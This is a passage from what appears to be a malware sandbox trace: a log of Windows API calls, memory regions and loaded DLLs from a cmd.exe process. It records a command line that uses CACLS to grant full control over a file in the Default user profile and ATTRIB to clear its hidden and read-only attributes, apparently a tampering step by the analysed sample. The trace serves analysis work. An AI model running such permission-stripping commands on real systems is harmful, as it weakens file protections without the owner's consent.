AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32100 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32101 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32102 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32103 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 32104 start_va = 0x4a530000 end_va = 0x4a57bfff entry_point = 0x4a530000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32105 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32106 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32107 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32108 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 32109 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32110 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32111 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32112 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32113 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private 
name = "private_0x0000000000260000" filename = "" Region: id = 32114 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 32115 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32116 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32117 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32118 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32119 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32120 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32121 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32122 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: 
"c:\\windows\\system32\\gdi32.dll") Region: id = 32123 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32124 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 32125 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32126 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32127 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32128 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 32129 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 32130 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 32131 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 32132 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 32133 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 32134 start_va = 0x1350000 end_va = 0x161efff entry_point = 0x1350000 region_type = mapped_file name = 
"sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 748 os_tid = 0xc68 [0216.169] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fb2c | out: lpSystemTimeAsFileTime=0x20fb2c*(dwLowDateTime=0xb5a60ca0, dwHighDateTime=0x1d440a9)) [0216.169] GetCurrentProcessId () returned 0x53c [0216.169] GetCurrentThreadId () returned 0xc68 [0216.169] GetTickCount () returned 0x3c7b1 [0216.169] QueryPerformanceCounter (in: lpPerformanceCount=0x20fb24 | out: lpPerformanceCount=0x20fb24*=27295842232) returned 1 [0216.170] GetModuleHandleA (lpModuleName=0x0) returned 0x4a530000 [0216.170] __set_app_type (_Type=0x1) [0216.170] __p__fmode () returned 0x76b331f4 [0216.170] __p__commode () returned 0x76b331fc [0216.170] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5521a6) returned 0x0 [0216.170] __getmainargs (in: _Argc=0x4a554238, _Argv=0x4a554240, _Env=0x4a55423c, _DoWildCard=0, _StartInfo=0x4a554140 | out: _Argc=0x4a554238, _Argv=0x4a554240, _Env=0x4a55423c) returned 0 [0216.171] GetCurrentThreadId () returned 0xc68 [0216.171] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc68) returned 0x38 [0216.171] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0216.171] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0216.171] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.171] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0216.171] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fabc | out: phkResult=0x20fabc*=0x0) returned 0x2 [0216.171] VirtualQuery (in: lpAddress=0x20faf3, lpBuffer=0x20fa8c, dwLength=0x1c | out: lpBuffer=0x20fa8c*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.171] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fa8c, dwLength=0x1c | out: lpBuffer=0x20fa8c*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0216.171] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fa8c, dwLength=0x1c | out: lpBuffer=0x20fa8c*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0216.171] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fa8c, dwLength=0x1c | out: lpBuffer=0x20fa8c*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.171] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fa8c, dwLength=0x1c | out: lpBuffer=0x20fa8c*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0216.171] GetConsoleOutputCP () returned 0x1b5 [0216.172] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a554260 | out: lpCPInfo=0x4a554260) returned 1 [0216.172] SetConsoleCtrlHandler (HandlerRoutine=0x4a54e72a, Add=1) returned 1 [0216.172] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.172] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0216.172] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.172] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5541ac | out: lpMode=0x4a5541ac) returned 1 [0216.172] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.172] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0216.172] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.172] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5541b0 | out: lpMode=0x4a5541b0) returned 1 [0216.173] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.173] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) 
returned 1 [0216.173] GetEnvironmentStringsW () returned 0x3e0208* [0216.173] FreeEnvironmentStringsW (penv=0x3e0208) returned 1 [0216.173] GetEnvironmentStringsW () returned 0x3e0208* [0216.173] FreeEnvironmentStringsW (penv=0x3e0208) returned 1 [0216.173] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ea2c | out: phkResult=0x20ea2c*=0x40) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x0, lpData=0x20ea38*=0x98, lpcbData=0x20ea30*=0x1000) returned 0x2 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x4, lpData=0x20ea38*=0x1, lpcbData=0x20ea30*=0x4) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x0, lpData=0x20ea38*=0x1, lpcbData=0x20ea30*=0x1000) returned 0x2 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x4, lpData=0x20ea38*=0x0, lpcbData=0x20ea30*=0x4) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x4, lpData=0x20ea38*=0x40, lpcbData=0x20ea30*=0x4) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x4, lpData=0x20ea38*=0x40, lpcbData=0x20ea30*=0x4) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ea34, 
lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x0, lpData=0x20ea38*=0x40, lpcbData=0x20ea30*=0x1000) returned 0x2 [0216.174] RegCloseKey (hKey=0x40) returned 0x0 [0216.174] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ea2c | out: phkResult=0x20ea2c*=0x40) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x0, lpData=0x20ea38*=0x40, lpcbData=0x20ea30*=0x1000) returned 0x2 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x4, lpData=0x20ea38*=0x1, lpcbData=0x20ea30*=0x4) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x0, lpData=0x20ea38*=0x1, lpcbData=0x20ea30*=0x1000) returned 0x2 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x4, lpData=0x20ea38*=0x0, lpcbData=0x20ea30*=0x4) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x4, lpData=0x20ea38*=0x9, lpcbData=0x20ea30*=0x4) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x4, lpData=0x20ea38*=0x9, lpcbData=0x20ea30*=0x4) returned 0x0 [0216.174] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ea34, lpData=0x20ea38, lpcbData=0x20ea30*=0x1000 | out: lpType=0x20ea34*=0x0, 
lpData=0x20ea38*=0x9, lpcbData=0x20ea30*=0x1000) returned 0x2 [0216.174] RegCloseKey (hKey=0x40) returned 0x0 [0216.174] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b2 [0216.175] srand (_Seed=0x5b8863b2) [0216.175] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"" [0216.175] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"" [0216.175] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a555260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.175] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e1968, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0216.175] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0216.175] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.175] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.176] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0216.176] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0216.176] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0216.176] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0216.176] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0216.176] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0216.176] 
_wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0216.176] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0216.176] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0216.176] GetEnvironmentStringsW () returned 0x3e2358* [0216.176] FreeEnvironmentStringsW (penv=0x3e2358) returned 1 [0216.176] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.176] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.176] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0216.176] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0216.176] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0216.176] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0216.176] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0216.176] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0216.176] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0216.176] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0216.176] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f7f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.177] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f7f8, lpFilePart=0x20f7f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f7f4*="Desktop") returned 0x18 [0216.177] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0216.177] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f574 | out: lpFindFileData=0x20f574) returned 0x3e09e8 [0216.177] FindClose (in: hFindFile=0x3e09e8 | out: hFindFile=0x3e09e8) returned 1 [0216.177] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f574 | out: 
lpFindFileData=0x20f574) returned 0x3e09e8 [0216.177] FindClose (in: hFindFile=0x3e09e8 | out: hFindFile=0x3e09e8) returned 1 [0216.177] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f574 | out: lpFindFileData=0x20f574) returned 0x3e09e8 [0216.178] FindClose (in: hFindFile=0x3e09e8 | out: hFindFile=0x3e09e8) returned 1 [0216.178] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0216.178] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0216.178] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0216.178] GetEnvironmentStringsW () returned 0x3e0208* [0216.178] FreeEnvironmentStringsW (penv=0x3e0208) returned 1 [0216.178] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a555260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.179] GetConsoleOutputCP () returned 0x1b5 [0216.179] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a554260 | out: lpCPInfo=0x4a554260) returned 1 [0216.179] GetUserDefaultLCID () returned 0x409 [0216.179] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a554950, cchData=8 | out: lpLCData=":") returned 2 [0216.179] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f938, cchData=128 | out: lpLCData="0") returned 2 [0216.179] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f938, cchData=128 | out: lpLCData="0") returned 2 [0216.179] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f938, cchData=128 | out: lpLCData="1") returned 2 [0216.179] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a554940, cchData=8 | out: lpLCData="/") returned 2 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a554d80, cchData=32 | out: lpLCData="Mon") returned 4 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a554d40, cchData=32 | out: 
lpLCData="Tue") returned 4 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a554d00, cchData=32 | out: lpLCData="Wed") returned 4 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a554cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a554c80, cchData=32 | out: lpLCData="Fri") returned 4 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a554c40, cchData=32 | out: lpLCData="Sat") returned 4 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a554c00, cchData=32 | out: lpLCData="Sun") returned 4 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a554930, cchData=8 | out: lpLCData=".") returned 2 [0216.180] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a554920, cchData=8 | out: lpLCData=",") returned 2 [0216.180] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0216.181] GetConsoleTitleW (in: lpConsoleTitle=0x3d0928, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.181] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0216.181] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0216.182] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0216.182] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0216.183] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0216.183] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0216.183] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0216.183] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0216.183] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0216.183] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0216.183] _wcsicmp (_String1="REM", 
_String2="CACLS") returned 15 [0216.183] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0216.186] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0216.186] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0216.186] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0216.186] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0216.186] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0216.186] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0216.186] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0216.188] GetConsoleTitleW (in: lpConsoleTitle=0x20f5cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.188] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0216.188] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0216.188] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0216.188] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0216.188] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0216.188] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0216.189] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0216.189] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0216.189] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0216.189] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0216.189] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0216.189] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0216.189] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0216.189] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0216.189] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0216.189] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0216.189] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0216.189] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0216.189] _wcsicmp (_String1="CACLS", 
_String2="RMDIR") returned -15 [0216.189] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0216.189] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0216.189] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0216.189] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0216.189] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0216.189] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0216.189] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0216.189] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0216.189] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0216.189] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0216.189] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0216.189] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0216.189] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0216.189] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0216.189] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0216.189] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0216.189] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0216.189] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0216.189] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0216.189] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0216.189] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0216.189] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0216.189] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0216.189] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0216.189] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0216.189] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0216.189] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0216.189] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0216.189] _wcsicmp 
